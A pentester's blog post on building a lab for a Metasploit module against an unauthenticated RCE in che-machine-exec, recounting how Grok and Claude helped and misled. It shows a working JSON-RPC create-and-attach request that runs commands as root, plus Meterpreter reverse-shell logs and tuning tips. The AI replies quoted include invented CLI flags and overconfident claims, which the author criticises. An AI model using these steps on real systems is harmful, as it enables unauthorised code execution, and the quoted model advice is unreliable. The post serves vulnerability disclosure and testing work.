I Asked Two AIs to Help Me Set Up a Test Environment. Here's What Actually Happened.

Tested with Grok 4 (4.20 Beta) and Claude Sonnet 4.6, February 2026

TL;DR: Two AIs, one trailing newline, several phantom CLI flags. Building a reproducible test environment for my Metasploit PR took considerably longer than either model promised.


I recently pushed a Metasploit module for CVE-2025-12548 - an unauthenticated RCE in che-machine-exec, a component of Red Hat OpenShift Dev Spaces - that we stumbled across during a pentest. The module was written, submitted, and reviewed in the final days of the engagement. Two months after opening the PR, the module remains unmerged; the reviewer couldn't reproduce the vulnerable environment. The Docker Hub image accepts connections but crashes when asked to execute commands, because it needs a running Kubernetes cluster behind it, and there doesn't appear to be a documented way to stand one up for testing.

The fix was obvious: write a reproducible Kubernetes setup guide that anyone could follow end to end. Easy in theory these days - I'd just ask an LLM, or better, two (because two confidently wrong answers are more interesting than one).

What followed was a few hours of rabbit holes, phantom flags and command options that didn't exist.



Starting with Grok

I opened Grok 4 (4.20 Beta) first. Asked it to research how to get a vulnerable che-machine-exec instance running locally:

so what would be the steps to get devspaces instance running locally on minikube / another small / simple local distro in docker ideally? research for blogs and articles first

It went off, cited sources, came back confident. The answer: deploy Eclipse Che 7.102.0 on Minikube using chectl, pin the version with --version=7.102.0 passed to chectl server:deploy. Done in under 30 minutes. Simple enough.

Grok's full response (trimmed for relevance)
The simplest & smallest local option is Eclipse Che (upstream) on Minikube with Docker
driver — this is lightweight, free (no Red Hat account), uses Docker under the hood, and
the che-machine-exec vuln behaves exactly the same as in Dev Spaces. Perfect for testing
your Metasploit module.

Target: Eclipse Che 7.102.x (matches Dev Spaces 3.21, vulnerable)

Step-by-step commands:

Deploy vulnerable Eclipse Che 7.102 (or any 7.x before ~7.104):

chectl server:deploy \
  --platform minikube \
  --version=7.102.0 \
  --installer=operator

(If the exact tag fails, try
--cheimage=eclipse/che-server:7.102.0 or check available tags on quay.io/eclipse/che-server)

This should get you a working vulnerable instance in <30 min. Great work on the module!

Running it produced:

Error: Nonexistent flag: --version=7.102.0
See more help with --help
    at validateArgs (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:10:19)
    at validate (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:173:5)

The flag doesn't exist on the deploy subcommand (for reference, chectl --version on my machine returned chectl/7.114.0 linux-x64 node-v18.20.4).
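The authoritative flag list is one command away: oclif-based CLIs like chectl print it with --help. A quick local sanity check (a sketch, guarded so it no-ops on machines where chectl isn't installed):

```shell
# Ask the CLI itself which flags the subcommand accepts; if --version is
# absent from this list, no amount of retrying will make it exist
if command -v chectl >/dev/null 2>&1; then
  chectl server:deploy --help   # the flag list for the deploy subcommand
  chectl --version              # the tool's own version - a different thing entirely
fi
```

Thirty seconds of this would have saved the first two deploy attempts.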

Grok had confused the tool's own version flag with a deploy-time image pinning option that simply doesn't exist. When I brought in Claude Sonnet 4.6 to peer review, it reached the same conclusion: the flag doesn't exist in current chectl source; the fallback --cheimage flag Grok suggested as an alternative was equally made up. (I was pasting Claude's reviews directly into the Grok chat and vice versa, using each model to challenge the other's output in real time. It's a surprisingly effective workflow; they're much better at spotting each other's mistakes than their own.)

Grok accepted the critique, updated the steps. Still wrong, just differently wrong. The revised suggestion leaned on --cheimage=eclipse/che-server:7.102.0, the very fallback flag Claude had just debunked; it doesn't exist either. At that point Grok pivoted to a different approach entirely: forget version-pinning the whole stack, deploy current Che and patch only the che-machine-exec deployment to use the known vulnerable image directly. This worked until it turned out the deployment name didn't exist in the newer Che version, at which point Grok suggested --version=7.102.0 again, the same flag it had already accepted was invalid two iterations earlier:

> chectl server:deploy --platform minikube --version=7.102.0

Error: Nonexistent flag: --version=7.102.0
See more help with --help
    at validateArgs (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:10:19)
    at validate (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:173:5)
    at Object.parse (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/index.js:19:35)
    at async Deploy.parse (/usr/local/lib/chectl/node_modules/@oclif/core/lib/command.js:246:25)

Its sign-off on that message:

Run the delete + deploy now and paste any output/error here (especially if the deploy step complains about version). I'll fix it instantly.

You're literally 10 minutes away from a working vulnerable instance. Go for it! 🚀

Claude called the source-build idea first. Grok accepted the critique immediately and produced the first working native-build commands in the very next message.


The Image That Wouldn't Run

The plan: deploy current Che, then patch the che-machine-exec deployment to swap in the known vulnerable image:

kubectl -n eclipse-che patch deployment che-machine-exec --type='json' \
  -p='[{"op":"replace","path":"/spec/template/spec/containers/0/image","value":"quay.io/eclipse/che-machine-exec:7.102.0"}]'

The pod immediately went into CrashLoopBackOff. Checking the logs:

exec /go/bin/che-machine-exec: no such file or directory

The binary was supposedly right there, yet the kernel disagreed. This is likely a FROM scratch pitfall: no shared libraries, no shell, nothing except the binary itself. If the binary has any dynamic linking or an architecture mismatch, you get exactly this error (but we moved on before confirming it, so take that with a pinch of salt).
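One quick way to test that theory, had we stayed on it: check the binary's linkage. Here /bin/ls stands in for the container binary (an illustration, not the actual image contents):

```shell
# A dynamically linked ELF records an interpreter path (ld-linux); inside a
# FROM scratch image that path doesn't exist, so execve fails with the same
# misleading "no such file or directory" even though the binary is present.
file /bin/ls            # look for "dynamically linked" and the interpreter path
ldd /bin/ls | head -n 3 # shared objects a scratch image wouldn't contain
```

A fully static binary (what scratch images expect) would instead report "statically linked" / "not a dynamic executable".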

Grok suggested explicitly specifying the entrypoint:

command: ["/go/bin/che-machine-exec"]
args: ["--port=3333", "--log-level=debug"]

Same error. Then env vars. Same error.

At this point I handed the thread fully to Claude Sonnet 4.6 and asked it to peer review everything done so far. The verdict: stop fighting the image, build from source instead.



Fine, We'll Build It Ourselves

The idea was sound: 1) clone the repo, 2) compile the Go binary, 3) run it directly on the host. No Docker image quirks, no Kubernetes pod lifecycle, no scratch image nonsense. Just a Go binary doing its thing.
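The build step itself is unremarkable. A sketch (the repo path comes from the upstream project; the vulnerable tag and output name are assumptions matching the versions used elsewhere in this post):

```shell
# Fetch the upstream source and build the Go binary directly on the host
git clone https://github.com/eclipse-che/che-machine-exec.git
cd che-machine-exec
git checkout 7.102.0               # pin a vulnerable release (assumes tags track versions)
go build -o che-machine-exec-vuln .
```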

This sidestepped the image problem entirely, but introduced a new one. The build worked first time, then we ran it:

PANI[0000] Error: Unable to create manager. Unable to get service account info.
panic: (*logrus.Entry) 0xc000509420
goroutine 1 [running]:
github.com/eclipse-che/che-machine-exec/exec.CreateExecManager()
        /home/osboxes/llm/cube/che-machine-exec/exec/exec-manager-provider.go:64 +0xf2

Right. che-machine-exec expects to run inside a Kubernetes pod, with a service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/. On a bare host, none of that exists.

So we faked it: created the directory, wrote a dummy token, a dummy namespace, and an empty ca.crt:

sudo mkdir -p /var/run/secrets/kubernetes.io/serviceaccount
echo "dummy-token" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/token > /dev/null
printf "eclipse-che" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/namespace > /dev/null
echo "" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/ca.crt > /dev/null

./che-machine-exec-vuln -url 0.0.0.0:3333 -static /tmp/static

Restarted. New error:

FATA[0000] pod selector is required. Configure custom pod selector or
che workspace/devworkspace id env var to activate defaults

Set that. New error:

FATA[0000] Unable to create activity manager. Cause: CHE_WORKSPACE_NAME or
DEVWORKSPACE_NAME environment variables must be set

Set those. New error:

ERRO[0218] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt:
data does not contain any valid RSA or ECDSA certificates

Each fix revealed the next requirement. It felt less like debugging and more like filling out a form where every field you complete reveals three more fields underneath. The binary's entire purpose, apparently, was to tell me what it needed next.

"What is my purpose?"
"You require a pod selector."
"Oh my god."
"Yeah. Welcome to Kubernetes."
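For the record, the env-var half of that form, consolidated (a sketch: CHE_WORKSPACE_NAME comes straight from the error message; the id variable's exact name is inferred from the error wording and from the selector that later shows up in the module's output):

```shell
# Satisfy the pod-selector and activity-manager startup checks
export CHE_WORKSPACE_ID=test-workspace-id   # default selector becomes che.workspace_id=test-workspace-id
export CHE_WORKSPACE_NAME=test-workspace    # placeholder value; it only has to be non-empty
# then relaunch: ./che-machine-exec-vuln -url 0.0.0.0:3333 -static /tmp/static
```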

The actual fix for the certificate was to stop writing an empty file and copy the real minikube CA cert instead:

sudo cp \
  $(kubectl config view --raw -o jsonpath='{.clusters[?(@.name=="minikube")].cluster.certificate-authority}') \
  /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

The token needed to be real too; generated from a service account with actual cluster permissions:

kubectl -n eclipse-che create token machine-exec-test | \
  sudo tee /var/run/secrets/kubernetes.io/serviceaccount/token > /dev/null

First Signs of Life

Eventually che-machine-exec-vuln started. The output was everything you want to see after a morning of panics:

[GIN-debug] Listening and serving HTTP on 0.0.0.0:3333
2026/02/18 12:56:19 Json-rpc MachineExec Routes:
2026/02/18 12:56:19 ✓ create
2026/02/18 12:56:19 ✓ check
2026/02/18 12:56:19 ✓ resize
2026/02/18 12:56:19 ✓ listContainers
INFO[0000] Activity tracker is run and workspace will be stopped in 24h0m0s

A quick healthcheck:

curl http://127.0.0.1:3333/healthz
# 200 OK

Then the real test:

wscat -c ws://localhost:3333/connect
{"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-18T13:01:12.623713495Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}

Sending a create command:

{"jsonrpc":"2.0","method":"create","params":{"cmd":["id"],"type":"process"},"id":1}

Returned an exec ID. Attaching to it:

wscat -c ws://localhost:3333/attach/1
uid=0(root) gid=0(root) groups=0(root),1005780000



Running the Module

The Metasploit module fired cleanly against it shortly after:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Started reverse TCP handler on 192.168.49.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-19T11:10:32.741522762Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...
[+] Command staged with process ID: 1
[*] Triggering execution via /attach/1...
[+] Payload triggered!
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.49.2
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 6 opened (192.168.49.1:4444 -> 192.168.49.2:41510) at 2026-02-19 11:10:33 +0000

Clean run. Almost.

Three minor caveats.

First, set LHOST to the minikube gateway IP, not 127.0.0.1. The reverse shell spawns inside a pod and can't route to the host's loopback.

Second, use ubuntu for your target pod, not busybox. Busybox doesn't have bash and cmd/unix/reverse_bash will fail silently with exit code 127.

Third, during testing I caught an intermittent "No hello message received" failure in the module. The server was up, the WebSocket connected, but roughly half the time the module failed before the exploit even fired.

Two consecutive runs, same server and config, but with body length 0 vs body length 151:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[-] Exploit aborted due to failure: unexpected-reply: No hello message received
[*] Exploit completed, but no session was created.

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Connecting to machine-exec service...
[*] Response body length: 151, body: "\x81~\x00\x93{\"jsonrpc\":\"2.0\",\"method\":\"connected\"..."
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{...,"text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...

Turns out the WebSocket upgrade completes and che-machine-exec immediately sends a hello frame. Sometimes it arrives fast enough to get absorbed into the HTTP 101 response body. Sometimes it arrives after Rex has finished parsing and res.body comes back empty. The fix was a socket fallback: when the body is empty, read the frame directly from the socket using get_wsframe. Fixed in this commit on PR #20835.


One More Hour I'm Not Getting Back

I thought it was done. I was wrong.

The next day I went to re-run the setup from scratch to verify the steps were reproducible before pushing to upstream. I asked Claude to consolidate the working commands into a clean setup guide. One hour later I had been harshly reminded of something.

The original working commands on day one used printf for the namespace file; Claude had corrected Grok's echo to avoid the trailing newline. When consolidating the guide on day two, Claude reverted to echo, matching Grok's original convention and silently undoing its own fix:

echo "eclipse-che" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/namespace > /dev/null

It had worked perfectly the day before. Now it wouldn't stage a command:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Started reverse TCP handler on 192.168.49.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-19T10:25:51.18847384Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...
[-] Exploit aborted due to failure: unexpected-reply: Failed to stage command: pods could not be found with selector: che.workspace_id=test-workspace-id
[*] Exploit completed, but no session was created.

I spent the better part of an hour banging my head against kubectl get pods (pod running, label correct), curl to the Kubernetes API (HTTP 200, pod returned), and cat /var/run/secrets/kubernetes.io/serviceaccount/namespace (looks fine) before checking the file size:

ls -l /var/run/secrets/kubernetes.io/serviceaccount/namespace
# -rw-r--r-- 1 root root 12 Feb 19 10:42 namespace

The file ends up 12 bytes. eclipse-che is 11 characters. The extra byte is \n. The binary reads the file and uses the raw string as the namespace. The API call goes to:

/api/v1/namespaces/eclipse-che%0A/pods

Which returns nothing. No error. Just an empty list. The error message is pods could not be found with selector: che.workspace_id=test-workspace-id - which is technically accurate and completely useless for diagnosing the actual problem. The fix is a one-word swap: echo becomes printf (or echo -n), neither of which appends a newline (I didn't packet-capture the API call to formally prove the %0A was the culprit, but the fix was immediate and the file size math checks out).
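The whole regression reproduces in two lines:

```shell
# echo appends a trailing newline; printf emits the string verbatim
echo   "eclipse-che" | wc -c   # 12 bytes: eleven characters plus \n
printf "eclipse-che" | wc -c   # 11 bytes: what the namespace file should contain
```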

There was no bug yesterday. The day-one commands used printf, which was correct. The bug only came into existence when Claude rewrote the guide on day two and substituted echo. It then became visible immediately because the day-two rebuild used real minikube credentials, meaning the namespace value was actually sent to the Kubernetes API for the first time. Re-running from scratch before publishing was the right call; it just wasn't supposed to be this educational.

Neither LLM caught it during troubleshooting. One of them caused it. I found it by re-running the steps and checking the file size.


What This Actually Tells Us

I ran this entire session manually rather than handing it to Claude Code or Codex to automate. Not because LLMs aren't useful; this post is evidence that they are. Grok identified the right platform, Claude identified the right architecture pivot, and both were genuinely helpful for reasoning about unfamiliar code. But the bug that cost me an hour, a trailing newline in a namespace file, wasn't just missed by an LLM - it was introduced by one. Claude silently rewrote a working printf as echo while consolidating the setup guide, and neither model could diagnose the regression.

I found it by checking ls -l and counting bytes. That was a human debugging instinct, not a prompt. It's the kind of skill that atrophies when you stop exercising it, and for this kind of work (exploratory debugging, where the failure modes are the point), staying in the driver's seat was the right trade-off, even if it took longer.

Grok's confidence calibration deserves its own mention. Every response, including the ones that were wrong, ended with variations of "you're literally one command away 🚀" and "10 seconds from success!" After four consecutive failures this stops feeling like encouragement and starts feeling like a miscalibrated prior. If the model can't tell you how confident it actually is, the confidence signal becomes noise.

I'm not convinced the time saved by full autonomy would have been reclaimed for anything useful either. In my experience, the hours you claw back tend to get reinvested into managing the AI workflow itself: prompt optimisation, sub-agent orchestration, tooling for the tooling. Your mileage may vary. But the pattern I keep seeing is that you end up in the same place, just with more moving parts.

LLMs are a tool. The critical thinking is still yours to maintain or lose. As someone put it recently: AI works as an amplifier. If you have zero skills, you cannot amplify them. The ls -l that cracked this wasn't something I could have prompted for, because I didn't know what I was looking for until I found it.


The PR is still open. The full setup guide is in the module documentation. Somewhere out there a Metasploit reviewer is finally going to get a shell.

Fair enough.